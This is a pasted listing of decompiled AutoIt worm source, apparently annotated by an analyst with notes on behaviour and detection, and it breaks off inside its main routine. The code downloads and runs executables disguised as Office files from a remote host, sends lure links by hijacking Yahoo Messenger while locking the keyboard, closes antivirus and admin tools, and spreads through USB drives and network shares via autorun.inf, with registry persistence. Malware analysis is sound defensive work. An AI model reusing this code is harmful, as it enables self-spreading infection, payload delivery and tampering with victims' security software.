
0ee8fbd762cdd6b2e8437b2d810604c4_vir

a guest
Jul 31st, 2015
  1. #NoTrayIcon
  2.  
  ; Analyst note: shell-out helper. Runs $arg00 through the command interpreter
  ; (@ComSpec /C) with the window hidden (@SW_HIDE) and waits for it to finish.
  ; In this listing it is only called from funmain() to drive the AT scheduler,
  ; so a hidden cmd.exe child spawning at.exe is the process-tree artefact to hunt for.
  3. Func a140030003034($arg00)
  4. Return RunWait(@ComSpec & " /C " & $arg00, "", @SW_HIDE)
  5. EndFunc
  6.  
  ; Analyst note: configuration fetch. Downloads a remote file named setting.doc
  ; (falling back to setting.xls when the first InetGet returns 0) and stores it as
  ; @SystemDir\setting.ini, i.e. an INI file served under an Office-document extension.
  ; The config is accepted only when [setting] downloaded = "success"; otherwise the
  ; same host is retried and then the www. form of the host.
  ; The host visible in this listing is yahoo.com; whether that is the real
  ; configuration host or a stand-in cannot be determined from the paste.
  ; Detection: an unexpected setting.ini in the system directory carrying
  ; Read-only/System/Hidden attributes, and HTTP GETs for /setting.doc or /setting.xls
  ; issued by a non-Office process.
  7. Func a250040004048()
  8. If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  9. InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  10. EndIf
  11. Sleep(1000)
  ; Validation marker: the downloaded INI must contain downloaded=success.
  12. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
  13. If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  14. InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  15. EndIf
  16. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
  17. If InetGet("http://www.yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  18. InetGet("http://www.yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  19. EndIf
  20. EndIf
  21. EndIf
  ; The config file is marked Read-only + System + Hidden regardless of the outcome above.
  22. FileSetAttrib(@SystemDir & "\" & "setting" & ".ini", "+RSH")
  23. EndFunc
  24.  
  ; Analyst note: second-stage downloader. Refreshes the config via a250040004048(),
  ; then walks five payload slots (filedownload1..5 in [setting] of setting.ini).
  ; For each slot the remote object <website>/<name>.doc (fallback <name>.xls) is saved
  ; as @SystemDir\<name>.exe, i.e. an executable fetched under a document extension.
  ; After a 3 s pause the file is hidden (+RSH) and executed only if its size in KB is
  ; at least the matching sizeNN value from the config.
  ; Both the download location ("website") and the file names come from the remote
  ; config, so they are not recoverable from this listing alone.
  ; Detection: .exe files created in the system directory by a process that just
  ; requested a .doc/.xls URL; content-type / magic-byte mismatch (MZ header served
  ; for a document extension) at the proxy.
  25. Func a55005000501f()
  26. a250040004048()
  ; --- slot 1 ---
  27. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") <> "" Then
  28. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
  29. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0) = 0 Then
  30. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0)
  31. EndIf
  32. Sleep(3000)
  33. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
  ; Size gate: file size in KB compared with size01 from the config.
  34. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size01", "")) Then
  35. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", "+RSH")
  36. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")
  37. EndIf
  38. EndIf
  39. EndIf
  40. EndIf
  ; --- slot 2 (same pattern, size02) ---
  41. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") <> "" Then
  42. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
  43. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0) = 0 Then
  44. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0)
  45. EndIf
  46. Sleep(3000)
  47. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
  48. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size02", "")) Then
  49. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", "+RSH")
  50. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")
  51. EndIf
  52. EndIf
  53. EndIf
  54. EndIf
  ; --- slot 3 (same pattern, size03) ---
  55. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") <> "" Then
  56. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
  57. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0) = 0 Then
  58. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0)
  59. EndIf
  60. Sleep(3000)
  61. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
  62. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size03", "")) Then
  63. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", "+RSH")
  64. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")
  65. EndIf
  66. EndIf
  67. EndIf
  68. EndIf
  ; --- slot 4 (same pattern, size04) ---
  69. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
  70. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
  71. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0) = 0 Then
  72. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0)
  73. EndIf
  74. Sleep(3000)
  75. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
  76. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size04", "")) Then
  77. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", "+RSH")
  78. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")
  79. EndIf
  80. EndIf
  81. EndIf
  82. EndIf
  ; --- slot 5 (size05). As written, the outer guard reads the filedownload4 key while
  ; every inner reference uses filedownload5; keep this in mind when reconstructing
  ; which payloads a given config would have triggered. ---
  83. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
  84. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
  85. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0) = 0 Then
  86. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0)
  87. EndIf
  88. Sleep(3000)
  89. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
  90. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size05", "")) Then
  91. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", "+RSH")
  92. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")
  93. EndIf
  94. EndIf
  95. EndIf
  96. EndIf
  ; Hour value (+2, folded at 12) is computed here but not used again inside this function.
  97. $a2640c040c013 = @HOUR + 2
  98. If $a2640c040c013 > 12 Then
  99. $a2640c040c013 = $a2640c040c013 - 12
  100. EndIf
  101. EndFunc
  102.  
  ; Analyst note: instant-messenger spreading routine. Builds ten lure messages
  ; (config keys tin[0]..tin[9], with hard-coded fallbacks below) that each end in a link
  ; to a file on an FTP host; the file name comes from config key "myweb" and defaults
  ; to selfextract.exe. If a Yahoo! Messenger window exists, one message is picked at
  ; random, placed on the clipboard, user input is blocked, and synthetic keystrokes
  ; drive the Messenger window to paste and send it.
  ; IoCs visible in this block: the FTP host and embedded login in the default lures,
  ; the default file name selfextract.exe, and the lure strings themselves.
  ; Detection: BlockInput followed by SendInput-style keystrokes into a messenger
  ; window from a process that is not the messenger; clipboard contents matching the
  ; lure text; outbound FTP to the listed host.
  103. Func a390060006024()
  104. $a2681b081b014 = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "myweb", "")
  105. If $a2681b081b014 = "" Then
  106. $a2681b081b014 = "selfextract.exe"
  107. EndIf
  ; Lure table: each entry is taken from the config when present, else from the literal.
  108. Dim $gdimarr0000[10]
  109. $gdimarr0000[0] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[0]", "")
  110. If $gdimarr0000[0] = "" Then
  111. $gdimarr0000[0] = "cyber cafe scandal visit ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  112. EndIf
  113. $gdimarr0000[1] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[1]", "")
  114. If $gdimarr0000[1] = "" Then
  115. $gdimarr0000[1] = "World Business news broadcaster ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  116. EndIf
  117. $gdimarr0000[2] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[2]", "")
  118. If $gdimarr0000[2] = "" Then
  119. $gdimarr0000[2] = "Regular monthly income by wearing your shorts at the comfort of your home for more info ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  120. EndIf
  121. $gdimarr0000[3] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[3]", "")
  122. If $gdimarr0000[3] = "" Then
  123. $gdimarr0000[3] = "Nfs carbon download ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  124. EndIf
  125. $gdimarr0000[4] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[4]", "")
  126. If $gdimarr0000[4] = "" Then
  127. $gdimarr0000[4] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  128. EndIf
  129. $gdimarr0000[5] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[5]", "")
  130. If $gdimarr0000[5] = "" Then
  131. $gdimarr0000[5] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/ " & $a2681b081b014 & " "
  132. EndIf
  133. $gdimarr0000[6] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[6]", "")
  134. If $gdimarr0000[6] = "" Then
  135. $gdimarr0000[6] = "stream Video of Nayanthara and Simbu ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  136. EndIf
  137. $gdimarr0000[7] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[7]", "")
  138. If $gdimarr0000[7] = "" Then
  139. $gdimarr0000[7] = "Aishwarya Rai videos ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  140. EndIf
  141. $gdimarr0000[8] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[8]", "")
  142. If $gdimarr0000[8] = "" Then
  143. $gdimarr0000[8] = "Free mobile games ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  144. EndIf
  145. $gdimarr0000[9] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[9]", "")
  146. If $gdimarr0000[9] = "" Then
  147. $gdimarr0000[9] = "Nse going to crash for more ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  148. EndIf
  ; Only acts when a window whose title starts with "Yahoo! Messenger" is present.
  149. If WinExists(WinGetTitle("Yahoo! Messenger", "")) = 1 Then
  150. ClipPut($gdimarr0000[Random(0, 9, 1)])
  ; Keyboard and mouse are locked for the duration of the keystroke sequence, so the
  ; user cannot interrupt it; input is released again at the end of the sequence.
  151. BlockInput(1)
  152. WinActivate(WinGetTitle("Yahoo! Messenger", ""))
  ; Alt/Ctrl shortcuts plus Ctrl+V pastes; the exact menu items they reach depend on
  ; the Messenger version and are not verifiable from this listing.
  153. Send("!m")
  154. Send("un")
  155. Send("^v {ENTER}{ENTER}")
  156. Send("^m")
  157. Send("{DOWN}")
  158. Send("^{SHIFTDOWN}{END}{SHIFTUP}")
  159. Send("{ENTER}")
  160. Send("^v {ENTER}")
  161. BlockInput(0)
  162. EndIf
  ; Minute value (+30, folded at 60) is computed here but not used again inside this function.
  163. $a1040f040f03c = @MIN + 30
  164. If $a1040f040f03c > 60 Then
  165. $a1040f040f03c = $a1040f040f03c - 60
  166. EndIf
  167. EndFunc
  168.  
  ; Analyst note: defence-evasion routine, called on every pass of the main loop in
  ; funmain(). It closes windows by title and removes competing autostart values:
  ;   - "Bkav2006": closes the window and deletes the HKLM Run value "BkavFw"
  ;     (presumably the Bkav antivirus product - confirm against vendor naming).
  ;   - "System Configuration", "Registry", "Windows mask": closed on sight
  ;     (presumably msconfig and Registry Editor, matched by title prefix).
  ;   - "[FireLion]": deletes the HKCU Run value "IEProtection" and calls Shutdown(2),
  ;     which is the reboot code in AutoIt.
  ;   - process cmder.exe is terminated.
  ; Detection: admin tools that close immediately after opening, unexpected reboots,
  ; and deletion of security-product Run values by a non-installer process.
  169. Func a4e0070007039()
  170. If WinExists("Bkav2006") Then
  171. WinClose("Bkav2006")
  172. RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "BkavFw")
  173. EndIf
  174. If WinExists("System Configuration") Then
  175. WinClose("System Configuration")
  176. EndIf
  177. If WinExists("Registry") Then
  178. WinClose("Registry")
  179. EndIf
  180. If WinExists("Windows mask") Then
  181. WinClose("Windows mask")
  182. EndIf
  183. If WinExists("[FireLion]") Then
  184. RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "IEProtection")
  185. Shutdown(2)
  186. EndIf
  187. If ProcessExists("cmder.exe") Then
  188. ProcessClose("cmder.exe")
  189. EndIf
  190. EndFunc
  191.  
  ; Analyst note: recursive folder-masquerade helper (admin code path). Walks every
  ; entry under $arg00; for each directory it copies @WindowsDir\regsvr.exe into that
  ; directory as "<dirname> .exe" (directory name, a space, then .exe), deletes any
  ; "<dirname>.exe" without the space, and recurses into the directory.
  ; The name test ($x <> "." OR $x <> "..") is true for any string, so it filters nothing.
  ; Cleanup/detection: search affected volumes for executables whose base name equals
  ; the parent folder name followed by a trailing space.
  192. Func a1b0090009002($arg00)
  193. Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
  194. While 1
  195. Dim $gdimvar0002 = FileFindNextFile($var0000)
  196. If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
  ; "D" in the attribute string marks a directory.
  197. If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
  198. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
  199. FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
  200. a1b0090009002($arg00 & "\" & $gdimvar0002)
  201. EndIf
  202. Sleep(1)
  203. WEnd
  204. FileClose($var0000)
  205. EndFunc
  206.  
  ; Analyst note: removable-media propagation (admin code path), called on every pass
  ; of the main loop. Enumerates removable drives, skips A: (using the second drive
  ; instead when A: is listed first) and writes to the chosen drive root:
  ;   - "New Folder .exe"  (copy of @WindowsDir\regsvr.exe)
  ;   - regsvr.exe         (copy of @SystemDir\regsvr.exe)
  ;   - autorun.inf        (copy of @SystemDir\setup.ini, then marked +RSH)
  ; and finally seeds every sub-folder through a1b0090009002().
  ; Only one drive is handled per call. Copies use overwrite flag 0, i.e. existing
  ; files are left in place.
  ; Mitigation: disable AutoRun/AutoPlay for removable media; detection: creation of a
  ; hidden autorun.inf together with regsvr.exe on a newly mounted volume.
  207. Func a630080008039()
  208. $a571230123018 = DriveGetDrive("REMOVABLE")
  209. If NOT @error Then
  ; Element 0 of the DriveGetDrive result is the count; the loop shifts the drive
  ; letters down by one into a local six-element array.
  210. Dim $gdimarr0001[6]
  211. $gdimarr0001[1] = ""
  212. For $a4f00f000f042 = 1 To $a571230123018[0]
  213. $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
  214. Next
  ; Case 1: first removable drive is not the floppy drive.
  215. If $gdimarr0001[0] <> "A:" Then
  216. If $gdimarr0001[0] <> "" Then
  217. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
  218. Sleep(1)
  219. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
  220. Sleep(1)
  221. FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
  222. FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
  223. Sleep(1)
  224. a1b0090009002($gdimarr0001[0])
  225. EndIf
  226. EndIf
  ; Case 2: first entry is A:, so the second removable drive (if any) is used.
  227. If $gdimarr0001[0] = "A:" Then
  228. If $gdimarr0001[1] <> "" Then
  229. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
  230. Sleep(1)
  231. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
  232. Sleep(1)
  233. FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
  234. FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
  235. Sleep(1)
  236. a1b0090009002($gdimarr0001[1])
  237. EndIf
  238. EndIf
  239. EndIf
  240. EndFunc
  241.  
  ; Analyst note: network-share propagation (admin code path). Enumerates subkeys of
  ; HKCU\...\Explorer\WorkgroupCrawler\Shares (Explorer's record of discovered shares),
  ; turns each key name into a UNC path, and attempts to copy regsvr.exe there as
  ; "New Folder .exe". Where that copy succeeds it also drops regsvr.exe, a hidden
  ; autorun.inf (from setup.ini) and seeds sub-folders via a1b0090009002().
  ; Afterwards it writes a value named "shared" under the same key; funmain() reads
  ; that value to decide whether this routine needs to run again.
  ; IoC: a REG_SZ value "shared" ending in "\New Folder .exe" under the
  ; WorkgroupCrawler\Shares key. Detection: SMB writes of autorun.inf / regsvr.exe to
  ; share roots from a workstation.
  242. Func a2200a000a01f()
  243. Dim $gdimarr0003[30]
  244. For $a4f00f000f042 = 1 To 30
  245. $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
  246. If @error Then ExitLoop
  ; Key names use "/" separators; convert them and prefix "\\" to form a UNC path.
  247. $a296220622038 = StringReplace($a296220622038, "/", "\")
  248. $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
  ; The first copy (overwrite flag 1) doubles as a write-access probe for the share.
  249. $a2b6270627002 = FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
  250. If $a2b6270627002 = 1 Then
  251. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
  252. FileCopy(@SystemDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
  253. FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
  254. a1b0090009002($gdimarr0003[$a4f00f000f042])
  255. EndIf
  256. Next
  257. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
  258. EndFunc
  259.  
  ; Analyst note: builds the autorun.inf template (admin code path). Writes an
  ; [Autorun] section to @SystemDir\setup.ini whose Open, Shellexecute and
  ; Shell\Open\command entries all point at regsvr.exe, then hides the file (+RSH).
  ; The propagation routines copy this file to drive and share roots as autorun.inf.
  ; IoC: a hidden setup.ini in the system directory containing an [Autorun] section.
  260. Func a5b00b000b003()
  261. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
  262. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
  263. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
  264. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell", "Open")
  265. Sleep(1)
  266. FileSetAttrib(@SystemDir & "\setup.ini", "+RSH")
  267. EndFunc
  268.  
  ; Analyst note: installation routine for the admin code path.
  ;   - Creates @SystemDir\28463 and sets System+Hidden on it.
  ;   - FileInstall extracts two files that were embedded in the compiled script at
  ;     build time (svchost.exe and svchost.001) into that folder; their contents are
  ;     not part of this listing and need separate analysis.
  ;   - Copies the running binary (@AutoItExe) to @SystemDir\regsvr.exe (hidden),
  ;     @WindowsDir\regsvr.exe (attributes cleared) and @SystemDir\"svchost .exe"
  ;     (note the space before the extension; hidden).
  ;   - Launches the dropped 28463\svchost.exe unless the HKCU Run value
  ;     "Msn Messsenger" already equals the hard-coded C:\WINDOWS\system32\regsvr.exe.
  ; The file names imitate Windows system binaries; the real ones are regsvr32.exe and
  ; svchost.exe (no space), which is a quick triage check.
  269. Func install()
  270. Opt("RunErrorsFatal", 0)
  271. DirCreate(@SystemDir & "\28463")
  272. FileSetAttrib(@SystemDir & "\28463", "SH")
  273. FileInstall("C:\svchost.exe", @SystemDir & "\28463\" & "svchost" & ".exe", 0)
  274. FileInstall("C:\svchost.001", @SystemDir & "\28463\" & "svchost" & ".001", 0)
  275. FileCopy(@AutoItExe, @SystemDir & "\" & "regsvr" & ".exe", 0)
  276. FileSetAttrib(@SystemDir & "\" & "regsvr" & ".exe", "+RSH")
  277. FileCopy(@AutoItExe, @WindowsDir & "\" & "regsvr" & ".exe", 0)
  278. FileSetAttrib(@WindowsDir & "\" & "regsvr" & ".exe", "-RSH")
  279. FileCopy(@AutoItExe, @SystemDir & "\" & "svchost " & ".exe", 0)
  280. FileSetAttrib(@SystemDir & "\" & "svchost " & ".exe", "+RSH")
  ; "==" is AutoIt's case-sensitive string comparison; the path is hard-coded rather
  ; than built from @SystemDir.
  281. $12345 = "C:\WINDOWS\system32\regsvr.exe"
  282. If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
  283. Run(@SystemDir & "\28463\" & "svchost" & ".exe", "")
  284. EndIf
  285. EndFunc
  286.  
  ; Analyst note: persistence and policy tampering for the admin code path.
  ;   - Winlogon\Shell is set to "Explorer.exe regsvr.exe", so the copy in the system
  ;     path is started alongside the shell at every logon.
  ;   - HKCU Run value "Msn Messsenger" (three s) points at @SystemDir\regsvr.exe.
  ;   - Policies: NofolderOptions = 0, DisableTaskMgr = 0, DisableRegistryTools = 1
  ;     (the last one blocks Registry Editor for the user).
  ;   - Services\Schedule AtTaskMaxHours = 0 (presumably lifts the run-time limit on
  ;     AT jobs - confirm against Task Scheduler documentation).
  ; Hunting strings: the misspelt value name "Msn Messsenger" and any Winlogon Shell
  ; value other than plain explorer.exe. Remediation must restore Shell and clear
  ; DisableRegistryTools as well as deleting the files.
  287. Func regedit()
  288. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & "regsvr" & ".exe")
  289. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @SystemDir & "\" & "regsvr" & ".exe")
  290. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  291. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  292. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
  293. RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
  294. EndFunc
  295.  
  ; Analyst note: main routine when the process has administrator rights.
  ; Order of operations: install files, set registry persistence, reset and re-create
  ; the AT scheduled job, write the autorun template, pull config and payloads, send
  ; the messenger lure, spread to network shares, then loop forever.
  ; Inside the loop every pass runs the defence-evasion and removable-drive routines;
  ; the downloader is re-run when @HOUR equals the start hour + 2 and the messenger
  ; lure when @MIN equals the start minute + 30. No wrap-around is applied to $hour or
  ; $min here, so the targets can fall outside the 0-23 / 0-59 ranges of the macros.
  ; Detection: at.exe invoked through a hidden cmd.exe with "/delete /yes" followed by
  ; a daily 09:00 /interactive job pointing at "svchost .exe" in the system directory.
  296. Func funmain()
  297. $hour = @HOUR + 2
  298. $min = @MIN + 30
  299. Opt("RunErrorsFatal", 0)
  300. install()
  301. regedit()
  ; Removes every existing AT job before registering its own daily job.
  302. a140030003034("AT /delete /yes")
